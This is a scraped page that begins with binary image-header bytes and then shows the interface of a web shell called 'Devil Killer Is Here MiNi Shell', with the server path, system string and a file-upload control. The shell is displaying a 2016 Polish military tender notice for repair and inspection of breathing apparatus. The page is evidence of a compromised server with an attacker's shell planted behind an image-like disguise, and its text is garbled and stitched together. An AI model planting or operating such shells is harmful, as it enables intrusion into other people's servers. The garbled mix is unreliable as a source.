JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160509/114528-N-2016.html

<p class="kh_header"><b>Szczecin: Usługa polegająca na wykonaniu napraw, konserwacji i przeglądów aparatów powietrznych  oraz masek do aparatów powietrznych.</b><br>
<b>Numer ogłoszenia: 114528 - 2016; data zamieszczenia: 09.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Narutowicza 17B, 70-240 Szczecin, woj. zachodniopomorskie, tel. 261 452026, 261 452000, faks 261 452024, 261 452029.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.rziszczecin.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa polegająca na wykonaniu napraw, konserwacji i przeglądów aparatów powietrznych  oraz masek do aparatów powietrznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na wykonaniu napraw, konserwacji i przeglądów aparatów powietrznych  oraz masek do aparatów powietrznych.
2.	Przedmiot zamówienia został podzielony na pięć części:
Część I - Naprawa i konserwacja aparatów powietrznych i masek do aparatów powietrznych typu
                  AERIS, X-PRO/FENZY.
                 Część II - Naprawa i konserwacja aparatów powietrznych i masek do aparatów powietrznych typu
                  BD-96 Compact / AUER.
Część III - Przegląd aparatów powietrznych i masek typu AERIS/FENZY.
 Część IV - Przegląd aparatów powietrznych i masek typu BD-96 COMPACT, AIRGO FIX / AUER.
 Część V  - Przegląd aparatów powietrznych i masek typu PSS 5000.

3.	Opis przedmiotu zamówienia został szczegółowo określony w Zestawieniu przedmiotu zamówienia - specyfikacja techniczna stanowiącym załącznik nr 4.1  do SIWZ - dla części I zamówienia, załącznik 4.2 do SIWZ - dla części II zamówienia, załącznik 4.3 do SIWZ - dla części III zamówienia, załącznik 4.4 do SIWZ - dla części IV zamówienia, załącznik 4.5 do SIWZ - dla części V zamówienia.
4.	Przedmiot zamówienia objęty częścią I i II zamówienia (naprawy) Wykonawca zobowiązuje się wykonywać w swojej siedzibie. Koszty transportu pokrywa Wykonawca. Odbioru przedmiotu zamówienia w celu wykonania naprawy Wykonawca dokona w RZI Szczecin przy ul. Ostrawickiej 16 w Szczecinie. Odbioru przedmiotu zamówienia po wykonaniu usługi dokona w swojej siedzibie wyznaczona przez Zamawiającego komisja, dokonując spisania protokołu odbioru, który będzie podstawą wystawienia faktury. Wykonawca zobowiązany jest dokonać wpisu w książkach paszportowych aparatów powietrznych i książkach przeglądów masek.
5.	Przedmiot zamówienia objęty częścią III, IV i V zamówienia (przeglądy) Wykonawca zobowiązuje się wykonywać w siedzibach Zamawiającego. Miejscowości oraz adresy wykonywania usług określone zostały w zał. nr 6 do SIWZ - Wykaz Wojskowych Oddziałów Gospodarczych i Jednostek Wojskowych oraz osób uprawnionych w imieniu Zamawiającego do odbioru usługi. Koszty związane z dojazdem do miejscowości, w których będą wykonywane przeglądy pokrywa Wykonawca.
Zamawiający najpóźniej  na 14 dni przed końcowym terminem realizacji usług określonym w załączniku- Terminy przeglądów aparatów powietrznych, nr 5.1  do SIWZ - dla części III zamówienia, załącznik 5.2 do SIWZ - dla części IV zamówienia, załącznik 5.3 do SIWZ - dla części V zamówienia powiadomi pismem (fax) Wykonawcę o możliwości przystąpienia do realizacji zamówienia (usługi). 
Wykonawca na 2 dni przed każdą planowaną usługą zobowiązany jest przesłać do odbiorcy docelowego usługi pismo, fax  potwierdzające gotowość realizacji usługi z jednoczesnym wskazaniem dokładnego terminu jej wykonania, osób (imię, nazwisko), które wezmą udział w realizacji zamówienia oraz rodzaju pojazdu (marka, typ, numer rejestracyjny)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 3 400,00 PLN  dla całości zamówienia, w  tym: 
dla części I:    	   1 400, 00 PLN,
dla części II:    	      600, 00 PLN,
dla części III:    	      400, 00 PLN,
dla części IV:    	      900, 00 PLN.
Zamawiający nie wymaga wniesienia wadium dla części V zamówienia

W przypadku składania oferty na kilka części, należy wnieść wadium w wysokości stanowiącej sumę tych części.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie posiadanie uprawnień do wykonywania określonej działalności lub czynności w zakresie pozwalającym na realizację zamówienia - warunek zostanie oceniony na podstawie złożonego oświadczenia o spełnianiu tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie posiadanie wiedzy i doświadczenia w zakresie niezbędnym do realizacji zamówienia -  warunek zostanie oceniony na podstawie złożonego oświadczenia o spełnianiu tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie dysponowanie odpowiednim potencjałem technicznym pozwalającym na realizację zamówienia - warunek zostanie oceniony na podstawie złożonego oświadczenia o spełnianiu tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie dysponowanie odpowiednimi osobami zdolnymi do wykonania zamówienia - odpowiedzialnymi za wykonanie usługi tj.: 

  Dla części I - min. 1 osobą zdolną do wykonania naprawy i konserwacji aparatów powietrznych i masek do aparatów powietrznych, która będzie uczestniczyć w wykonywaniu usług, posiadająca odpowiednie i aktualne uprawnienia do wykonywania naprawy i konserwacji aparatów powietrznych i masek do aparatów powietrznych typu, AERIS, X-PRO/FENZY zgodnie z wymaganiami podanymi w instrukcji fabrycznej producenta.
   
Dla części II - min. 1 osobą zdolną do wykonania naprawy i konserwacji  aparatów powietrznych i masek do aparatów powietrznych, która będzie uczestniczyć w wykonywaniu usług, posiadająca odpowiednie i aktualne uprawnienia do wykonywania naprawy i konserwacji aparatów powietrznych i masek do aparatów powietrznych typu BD-96 Compact/ AUER, zgodnie z wymaganiami podanymi w instrukcji fabrycznej producenta.

Dla części III - min. 1 osobą zdolną do wykonania przeglądów aparatów powietrznych i masek do aparatów powietrznych, która będzie uczestniczyć w wykonywaniu usług, posiadająca odpowiednie i aktualne uprawnienia do wykonywania przeglądów aparatów powietrznych i masek do aparatów powietrznych typu AERIS/FENZY, zgodnie z wymaganiami podanymi w instrukcji fabrycznej producenta

Dla części IV - min. 1 osobą zdolną do wykonania przeglądów aparatów powietrznych i masek do aparatów powietrznych, która będzie uczestniczyć w wykonywaniu usług, posiadająca odpowiednie i aktualne uprawnienia do wykonywania przeglądów aparatów powietrznych i masek do aparatów powietrznych typu BD-96 COMPACT, AIRGO FIX / AUER, zgodnie z wymaganiami podanymi w instrukcji fabrycznej producenta

Dla części V - min. 1 osobą zdolną do wykonania przeglądów aparatów powietrznych i masek do aparatów powietrznych, która będzie uczestniczyć w wykonywaniu usług, posiadająca odpowiednie i aktualne uprawnienia do wykonywania przeglądów aparatów powietrznych i masek do aparatów powietrznych typu PSS 5000, zgodnie z wymaganiami podanymi w instrukcji fabrycznej producenta

W przypadku składania oferty na kilka części Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże dysponowanie min. 1 osobą posiadającą odpowiednie i aktualne uprawnienia do wykonywania napraw, konserwacji i przeglądów poszczególnych typów aparatów powietrznych i masek do aparatów objętych daną częścią zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - warunek zostanie oceniony na podstawie złożonego oświadczenia o spełnianiu tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz cenowy dla części I, II, III, IV, V zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>DLA I I II CZĘŚCI ZAMÓWIENIA:

1.	Zmiana danych związanych z obsługą administracyjno-organizacyjną umowy  (np. zmiana numeru rachunku bankowego),
2.	Zmiany danych teleadresowych,
3.	Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy, 
4.	Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze szczegółowym opisem-Zestawieniem Przedmiotu zamówienia-Specyfikacja Techniczna).
Wszystkie zmiany i uzupełnienie umowy dokonywane są w formie pisemnej pod rygorem nieważności aneksem i muszą być podpisane przez upoważnionych przedstawicieli obu stron.


      DLA III, IV, V CZĘŚCI ZAMÓWIENIA:

1.	Zmiana danych związanych z obsługą administracyjno-organizacyjną umowy  (np. zmiana numeru rachunku bankowego),
2.	Zmiany danych teleadresowych,
3.	Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy, 
4.	Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze szczegółowym opisem-Zestawieniem Przedmiotu zamówienia-Specyfikacja Techniczna),
5.	Zmiany (przesunięcia) terminu przeglądów aparatów powietrznych i masek,
6.	Zmiany ilości przeprowadzanych przeglądów bez zmiany uśrednionej, ryczałtowej, jednostkowej ceny ofertowej przeglądów, przy czym całkowita wartość usługi nie może przekroczyć ceny oferty.
Wszystkie zmiany i uzupełnienie umowy dokonywane są w formie pisemnej pod rygorem nieważności aneksem i muszą być podpisane przez upoważnionych przedstawicieli obu stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rziszczecin.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury, Narutowicza 17B, 70-240 Szczecin..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2016 godzina 10:00, miejsce: kancelaria Rejonowego Zarządu  Infrastruktury w  Szczecinie -  pok. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Termin wykonywania zamówienia:
          -  dla części I, II  -   31 dni od dnia 01.08.2016 r. 
          - dla części III - 90 dni od dnia 01.07.2016 r., zgodnie z określonymi w zał. nr 5.1 do SIWZ
                                         terminami przeglądów.
          - dla części IV    -   30 dni od dnia 01.09.2016 r., zgodnie z określonymi w zał. 5.2 do SIWZ
                                         terminami przeglądów.
          - dla części IV    -   30 dni od dnia 01.09.2016 r., zgodnie z określonymi w zał. 5.3 do SIWZ
                                         terminami przeglądów.

2.	Przy ocenie ofert i wyborze najkorzystniejszej oferty Zamawiający posługiwał się będzie następującymi kryteriami i ich znaczeniem: 

      DLA I I II CZĘŚCI ZAMÓWIENIA:

     - kryterium ceny - waga 90 % 
     - kryterium okres gwarancji (przedłużenie) - waga 10 % 

     Liczba punktów przyznana przez Zamawiającego za kryterium Cena zostanie określona wg wzoru:

                                    
                        Pc = X/Y x 90
                                    

Pc - obliczone punkty za kryterium cena
X - cena najniższa wśród badanych ofert (zł)
Y - cena oferty badanej (zł)

Maksymalna ilość punktów możliwych do uzyskania przez oferenta: 90 pkt

Liczba punktów przyznana przez Zamawiającego za kryterium Okres gwarancji zostanie określona wg wzoru:

                                    
                         Pg = X/Y x 10
                                    

Pg - obliczone punkty za kryterium okres gwarancji
X - przedłużenie okresu gwarancji w badanej ofercie (w miesiącach)
Y - maksymalne przedłużenie okresu gwarancji (w miesiącach)

Maksymalna ilość punktów możliwych do uzyskania przez oferenta: 10 pkt

  Warunki brzegowe dla kryterium Okres gwarancji:
  - Maksymalne przedłużenie okresu gwarancji wynosi 6 miesięcy
  - Wykonawca, który nie zaoferuje przedłużenia okresu gwarancji otrzyma 0 pkt. W przypadku podania okresu gwarancji  dłuższego  niż 6 miesięcy, do obliczeń zostanie przyjęte 6 miesięcy.

Dokonując oceny Zamawiający zsumuje punkty w odniesieniu do kryterium ceny i terminu wg następującego wzoru:

                         Po (Punkty oferty) = Pc (Punkty cena) + Pg (Punkty gwarancja)

1) 	Maksymalna ilość punktów, jaką po uwzględnieniu wag może osiągnąć oferta wynosi 100 pkt. 
2) 	Liczba punktów zostanie zaokrąglona do 2 miejsc po przecinku.
3) 	Zamawiający wybierze ofertę najkorzystniejszą spośród wszystkich niepodlegających odrzuceniu ofert wyłącznie na podstawie kryteriów oceny ofert. Oferta, która spełni wszystkie warunki i wymagania oraz uzyska najwyższą liczbę punktów, obliczoną według powyższych wzorów zostanie uznana przez Zamawiającego za najkorzystniejszą.

DLA III, IV, V CZĘŚCI ZAMÓWIENIA:

- kryterium Cena - waga  - 90 %
- kryterium Termin gotowości do realizacji usługi - waga 10 %

Liczba punktów przyznana przez Zamawiającego za kryterium Cena zostanie określona wg wzoru:

                                    
                        Pc = X/Y x 90
                                    

Pc - obliczone punkty za kryterium cena
X - cena najniższa wśród badanych ofert (zł)
Y - cena oferty badanej (zł)


Maksymalna ilość punktów możliwych do uzyskania przez oferenta: 90 pkt

Liczba punktów przyznana przez Zamawiającego za kryterium Termin gotowości do realizacji usługi zostanie określona wg wzoru:


		        
                        Pt = X/Y x 10
                                     

Pt - obliczone punkty za kryterium Termin gotowości do realizacji usługi 
X - zadeklarowane przez Wykonawcę skrócenie terminu gotowości do realizacji usługi
Y - maksymalne skrócenie terminu gotowości do realizacji usługi

Maksymalna ilość punktów możliwych do uzyskania przez oferenta: 10 pkt
                                          
  Warunki brzegowe dla kryterium Termin gotowości do realizacji usługi:
- Najdłuższy termin gotowości do realizacji usługi - 14 dni od terminu powiadomienia przez zamawiającego o możliwości przystąpienia do realizacji usługi,
- Maksymalne skrócenie terminu gotowości do realizacji usługi - 12 dni od określonego najdłuższego terminu,
- Jeśli Wykonawca nie zaoferuje skrócenia terminu gotowości do realizacji usługi  otrzyma 0 pkt,
- W przypadku podania skrócenia terminu gotowości do realizacji usługi dłuższego niż 12 dni do obliczeń zostanie przyjęte 12 dni.

Dokonując oceny Zamawiający zsumuje punkty w odniesieniu do kryterium ceny i terminu wg następującego wzoru:
 Po (Punkty oferty) = Pc (Punkty cena) + Pt (Punkty Termin gotowości do realizacji usługi)

  1) Maksymalna ilość punktów, jaką po uwzględnieniu wag może osiągnąć oferta wynosi 100 pkt. 
  2) Liczba punktów zostanie zaokrąglona do 2 miejsc po przecinku.
  3) Zamawiający wybierze ofertę najkorzystniejszą spośród wszystkich niepodlegających odrzuceniu ofert wyłącznie na podstawie kryteriów oceny ofert. Oferta, która spełni wszystkie warunki i wymagania oraz uzyska najwyższą liczbę punktów, obliczoną według powyższych wzorów zostanie uznana przez Zamawiającego za najkorzystniejszą..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Naprawa i konserwacja aparatów powietrznych i masek do aparatów powietrznych typu AERIS, X-PRO/FENZY..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na wykonaniu napraw, konserwacji i przeglądów aparatów powietrznych  oraz masek do aparatów powietrznych.
Część I - Naprawa i konserwacja aparatów powietrznych i masek do aparatów powietrznych typu AERIS, X-PRO/FENZY
2.	Opis przedmiotu zamówienia został szczegółowo określony w Zestawieniu przedmiotu zamówienia - specyfikacja techniczna stanowiącym załącznik nr 4.1  do SIWZ - dla części I zamówienia
3.	Przedmiot zamówienia objęty częścią I zamówienia (naprawy) Wykonawca zobowiązuje się wykonywać w swojej siedzibie. Koszty transportu pokrywa Wykonawca. Odbioru przedmiotu zamówienia w celu wykonania naprawy Wykonawca dokona w RZI Szczecin przy ul. Ostrawickiej 16 w Szczecinie. Odbioru przedmiotu zamówienia po wykonaniu usługi dokona w swojej siedzibie wyznaczona przez Zamawiającego komisja, dokonując spisania protokołu odbioru, który będzie podstawą wystawienia faktury. Wykonawca zobowiązany jest dokonać wpisu w książkach paszportowych aparatów powietrznych i książkach przeglądów masek.
4.	Termin wykonywania zamówienia dla części I -   31 dni od dnia 01.08.2016 r. 
5.	Wartość szacunkowa I części zamówienia: 55 680,00 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 31.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
